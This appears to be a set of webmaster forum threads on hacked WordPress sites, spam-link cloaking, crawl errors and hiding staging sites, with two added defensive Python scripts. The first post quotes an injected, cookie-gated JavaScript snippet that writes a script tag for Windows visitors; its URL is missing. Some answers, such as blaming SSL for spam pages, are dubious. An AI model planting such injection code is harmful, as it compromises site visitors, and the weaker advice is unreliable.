I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
That URL at the end is super suspicious. I googled but found no leads :-(
I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.
Does anyone have any knowledge of this?
That looks strange to me. Maybe try reinstalling WordPress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the Google Analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer than 8 letters. If your site is infected, take it down from the web NOW until you're sure it's not.
I got an email this morning from Google Search Console about 'Social Engineering Content Detected on Your Site', and the link they sent is something like this: http://****.co[.]uk/~bettingb/
The website is a WordPress website, and I searched for the link in my files and database and only found it in the Wordfence table wp_wfHits.
Is it possible that Google crawled that link from this table?
Is this something serious?
Any advice?
Before you act upon cjmling's advice, wp_wfHits is a legitimate table created by Wordfence (a security plugin).
As shown here
The fact that it is in this table means that Wordfence has noticed it, which is exactly what you want. I cannot imagine that this is the only place in the database that has this but it may be encoded elsewhere.
The other thing is that Wordfence may have already cleaned up the issue between Google spotting it and you looking into it. I would let Search Console run again and see if it is found again.
DO NOT think that your site has been fully compromised. Change any admin passwords, but you'll probably find that it was stuff added as a comment to a post (usual WordPress "hack").
Also, if you really want to be secure, change the database prefix (Wordfence I think has this option out of the box), which means you are then not using the standard "wp_" prefix and you can spot things more easily!
I'm using WordPress 4.9.1–en_GB, and have a live site which has been up and live for some months without issue.
48 hours ago it suddenly (or rather I noticed suddenly) started displaying some pages as unformatted (no css) lists of links and text. The links on those pages were to another domain which directed to my site, but which has never been part of my site, and for which there is no direction within the site.
Loading and saving that one page fixed it on that page, and another page which was exhibiting the issue.
I redirected the external domain so that it would not point to my website.
Today it has exhibited the same behaviour, but with a subdomain which points to my site, but which again is not in use. Again saving the page without making any edits 'fixed' the behaviour.
I'm not asking for a fix - but whether anyone has ever experienced a similar problem, or has a pointer towards where to look, and will report back what I find, in the hope it helps someone else if it ever occurs to them.
I didn't originally build the site - it has a load of plugins, not all active and disabling and removing plugins is definitely an option - but not a great one, since the problem is not predictable, so I have no firm way of knowing whether my actions have fixed the issue, and in the meantime my commercial site will not be functioning as desired (which I appreciate is occasionally the case anyway it would seem).
It sits in Amazon EC2.
Sorry for the lack of precision, but I am truly stumped.
This sounds like your website may have been breached. The conflict of web pages not formatting is usually the SSL not being installed correctly on the server. But if you have a lot of plugins installed, it's a huge security issue, and the plugins may be causing the domain issue.
The plugins may be causing a conflict with each other; I would recommend removing the plugins that generally don't get used.
Deactivate the plugins in use and reactivate them.
Use the Wordfence security plugin to run a scan on your website.
When I had this problem, it was because the SSL was not installed on my server correctly. If not that, a breach may be the cause. I hope this helps.
If the issue started within that time frame as stated, that makes me more confident that this is an SSL issue. Sometimes an SSL doesn't install correctly on a server, and this can cause a conflict with how the layout in CSS and HTML is affected. This is common in some cases. While it's happening with the current theme you're using, some WordPress themes can bypass the SSL error. I would recommend getting a new SSL from Let's Encrypt and removing the one that was auto-renewed through Let's Encrypt. This could simply fix the problem. If not, feel free to share your findings on the issue.
I recently built and published my WordPress site at www.kernelops.com and submitted it to the Google index and Webmaster Tools. Today I logged into Webmaster Tools and found 60 URL errors, all with the same type of issue. The base domain address www.kernelops.com is being appended to all my site's page, category, and post URLs. An example of the failed URL looks like this:
http://www.kernelops.com/blog/www.kernelops.com
Google Webmaster Tools indicates that this weird link is originating from the base URL "http://www.kernelops.com/blog", which obviously means the issue is on my end. My WordPress permalink settings are set to use the post name; I'm not sure if that could be causing this, i.e.:
http://www.kernelops.com/sample-post/
I can't seem to find any help resolving this weird issue with Google searches and thought someone here may be able to point me in the right direction.
The WordPress plugins that would potentially affect the site's URLs are the following:
All in One SEO
XML-Sitemap
But I can't see any sort of setting within these plugins that would be causing this type of issue.
Any ideas would be greatly appreciated - thanks in advance!
This is a long shot, but it may be happening if the Google crawler picks up a link that seems like a relative path and attempts to append it to the current directory. It's highly unlikely that Google would have such a bug, but it's not impossible either.
The closest thing I could find that may be considered a relative path is this:
<div class="copyright">
...
Kernel, Inc.
...
</div>
I doubt that this is the problem, but it may be worth fixing it.
Now, there is yet another possibility, and that's if the website serves slightly different content depending on the User Agent string. When Google presents your website with a User Agent string, the SEO plugin detects it and tries to optimize things in order to improve your ranking (I'm not familiar with those plugins, so I don't know what it does exactly). There may be a bug in the SEO plugin that will cause the www.kernelops.com URL to look like a relative path or to actually construct that faulty URL somehow.
You can possibly test this by setting the user-agent string in your browser (e.g. Firefox's user-agent switcher) to Googlebot's user-agent string and testing what happens when you visit your website. Look at the page source that you receive and look for any links that might look like the one Google is finding.
However, if the SEO tool is smart enough, it will "realize" that your IP doesn't match one of the valid IPs for Googlebot and it will not make the modifications.
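Added example, not part of the original answer: one way to automate the user-agent comparison described above is to extract the links from the page as served to a browser and as served to a Googlebot user agent, then list links that only the crawler view contains and schemeless hrefs that a crawler resolves as relative paths. The sample HTML bodies, the trailing slash on the base URL and the `spam.example` link are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
from urllib.request import Request, urlopen

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

def fetch(url, user_agent):
    """Fetch your own page with a chosen User-Agent (not used by the offline demo)."""
    with urlopen(Request(url, headers={"User-Agent": user_agent}), timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")

class _Links(HTMLParser):
    """Collect raw href values from <a> tags."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v.strip() for k, v in attrs if k == "href" and v]

def resolved_links(html, base_url):
    """Map each raw href to the absolute URL a crawler would resolve it to."""
    parser = _Links()
    parser.feed(html)
    return {raw: urljoin(base_url, raw) for raw in parser.hrefs}

def audit(browser_html, crawler_html, base_url):
    """Return (URLs only in the crawler view, schemeless hrefs that name the host)."""
    browser = resolved_links(browser_html, base_url)
    crawler = resolved_links(crawler_html, base_url)
    crawler_only = sorted(set(crawler.values()) - set(browser.values()))
    host = urlparse(base_url).hostname
    hostlike = sorted(
        (raw, url) for raw, url in crawler.items()
        if not urlparse(raw).scheme and raw.split("/")[0].lower() in (host, "www." + host)
    )
    return crawler_only, hostlike

# Constructed sample bodies; real ones would come from fetch() with two user agents.
BASE = "http://www.kernelops.com/blog/"  # trailing slash is an assumption
BROWSER_HTML = '<a href="http://www.kernelops.com/sample-post/">Post</a> <a href="www.kernelops.com">Home</a>'
CRAWLER_HTML = BROWSER_HTML + ' <a href="http://spam.example/offer">offer</a>'

if __name__ == "__main__":
    only_for_crawler, hostlike = audit(BROWSER_HTML, CRAWLER_HTML, BASE)
    print("served only to crawler UA:", only_for_crawler)
    print("schemeless host-like hrefs:", hostlike)
```

An empty crawler-only list is not proof of a clean site: as the answer says, code that checks the requester's IP will not serve the crawler variant to a spoofed user agent.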
Last Wednesday a variety of the WordPress sites I manage got hacked; they were infected with a Viagra link (malware is so original).
I noticed in the wp-includes directory a file called utils.php (wp-includes/js/tinymce/utils/utils.php), also an addition to my general-template.php for the get_footer function.
This hack seems to only affect Google search results for sites, not the site when directly viewed by entering the URL, i.e. your cached site will show a malware-infested mess and lose ranking, meanwhile you will wonder why, due to the site looking fine when viewed.
My host (TSO Host) have cleaned up the sites, didn't even need to ask, but I have no idea how the infection got there in the first place.
So my question is, does anyone know how the breach happens and what I can do to prevent it, other than the usual security tips?
This happened to a site that I spent weeks cleaning up. I can give you a few pointers:
Go through the WordPress core files (under wp-admin and wp-includes) and delete all files that you don't see in the default WordPress installation. I've never seen a plugin create a file in one of those 2 directories. After this, it'd be a good idea to re-install WordPress, just in case they changed any of the existing files.
After that, change your WordPress/FTP/SSH passwords, as they've likely been cracked. Install WP Better Security. It seems a little annoying at first, but you can monitor everything with it, change the login slug, remove version info hackers can use to find security holes, black-list known hackers, and so much more.
Finally, this last one will take some time. Google your theme and each one of your plugins, and see if WordPress has stopped using them because they were a security vulnerability. You'd be surprised at how many plugins have holes. Try to avoid really new plugins, and try to use the same plugin for as many different sites as you can. If you're hosting more than one site on the same server and one of the sites gets hacked, they're all hacked.
It sounds like a pain, and it is a little bit, but after you're done you'll feel so much better knowing that you're in control of everything. Trust me.
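Added example, not part of the original answer: the first pointer (find files under wp-admin and wp-includes that a default installation does not contain, and catch changed core files) can be done by comparing the live tree against a freshly unpacked copy. This sketch assumes the clean copy is the same WordPress version and locale as the site; the function names and the two small demo trees are constructed, with the demo's extra and modified files standing in for the two changes described in the question.

```python
import hashlib
import os
import tempfile

CORE_DIRS = ("wp-admin", "wp-includes")  # the two directories named in the answer

def _hashes(root):
    """Map each file under the core dirs (relative path) to its SHA-256."""
    found = {}
    for core in CORE_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, core)):
            for name in files:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, "rb") as fh:
                    found[rel] = hashlib.sha256(fh.read()).hexdigest()
    return found

def compare_core(site_root, clean_root):
    """Return (extra, modified, missing) file lists, site vs. clean copy."""
    site, clean = _hashes(site_root), _hashes(clean_root)
    extra = sorted(set(site) - set(clean))      # not in a default install
    missing = sorted(set(clean) - set(site))    # core file deleted from the site
    modified = sorted(p for p in site.keys() & clean.keys() if site[p] != clean[p])
    return extra, modified, missing

def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(data)

def demo():
    """Build two small constructed trees and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = os.path.join(tmp, "clean"), os.path.join(tmp, "site")
        for root in (clean, site):
            _write(root, "wp-includes/general-template.php", "<?php // stock\n")
            _write(root, "wp-admin/index.php", "<?php // stock\n")
        # Constructed stand-ins for the added file and the edited template.
        _write(site, "wp-includes/js/tinymce/utils/utils.php", "<?php // unknown\n")
        _write(site, "wp-includes/general-template.php", "<?php // stock + extra\n")
        return compare_core(site, clean)

if __name__ == "__main__":
    extra, modified, missing = demo()
    print("extra:", extra)
    print("modified:", modified)
    print("missing:", missing)
```

Review the extra and modified lists before deleting anything, and keep a copy of the flagged files if you want to work out how they got there.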
What's the best recommended way to hide my staging website from search engines? I Googled it and found that some say I should put a meta tag, and some said that I should put a text file inside my website directory; I want to know the standard way.
My current website is in ASP.NET, while I believe that there must be a common way for any website, whatever its programming language.
Use a robots.txt file.
See here: http://www.robotstxt.org/robotstxt.html
You could also use your server's robots.txt:
User-agent: *
Disallow: /
Google's crawler actually respects these settings.
Really easy answer; password protect it. If it’s a staging site then it quite likely is not intended to be publicly facing (private audience only most likely). Trying to keep it out of search engines is only treating a symptom when the real problem is that you haven’t appropriately secured it.
Keep in mind that you can't hide a public-facing unprotected web site from a search engine. You can ask that bots not index it (through the robots.txt that my fine colleagues have brought up), and the people who write the bots may choose not to index your site based on that, but there's got to be at least one guy out there who is indexing all the things people ask him not to index. At the very least one.
If this is a big requirement, keeping automated crawlers out, some kind of CAPTCHA solution might work for you.
http://www.robotstxt.org/robotstxt.html
There are search engines / bookmarking services which do not use robots.txt. If you really don't want it to turn up ever, I'd suggest using CAPTCHAs just to navigate to the site.
What's the best recommended way to hide my staging website from search engines
Simple: don't make it public. If that doesn't work, then only make it public long enough to validate that it is ready to post live and then take it down.
However, all that said, a more fundamental question is, "Why care?". If the staging site is really supposed to be the live site one step before pushing live, then it shouldn't matter if it is indexed.